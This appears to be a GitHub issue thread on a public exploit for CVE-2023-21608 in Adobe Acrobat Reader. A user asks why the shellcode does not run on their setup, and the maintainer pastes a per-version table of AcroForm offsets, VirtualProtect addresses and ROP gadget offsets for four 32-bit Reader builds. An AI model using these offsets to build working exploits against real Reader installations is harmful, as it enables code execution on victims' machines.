hacksysteam/CVE-2023-21608

Running on 64-bit Windows

Hello,
I tried the exploit on Windows 10 64-bit with 32-bit Acrobat Reader. Though the JavaScript seems to run till shellcode execution, the calc didn't pop up (Reader didn't crash at the end of execution). Is the exploit code dependent on the Windows build too?
The AcroForm.api is without debug symbols in the free version. Does it come with debug symbols in the pro version? Or are there any ways to get debug symbols?
Any guidance on these please.

Hi @badf00d51, currently the exploit only supports these 32-bit versions, as these were tested.

const VersionData = {
    22.00120085: {
        AcroFormOffset: 0x00293fe0,
        VirtualProtect: 0x007da108,
        ROP: [0x6faa60, 0x256984, 0x1e646]
    },
    22.00120117: {
        AcroFormOffset: 0x00293fe0,
        VirtualProtect: 0x007d9108,
        ROP: [0x6f9900, 0x256974, 0x5030f9]
    },
    22.00120142: {
        AcroFormOffset: 0x00294060,
        VirtualProtect: 0x007d9108,
        ROP: [0x6f9a00, 0x256a14, 0x49caf7]
    },
    22.00320258: {
        AcroFormOffset: 0x002943c0,
        VirtualProtect: 0x007da108,
        ROP: [0x6fa7a0, 0x32c71 /*xchg eax, esp ; RET ;*/, 0x1a4592 /*pop esp ; ret; */]
    }
};

Also, there are no symbols available for Adobe Reader. We used custom scripts to rebuild the symbols that we thought were correct.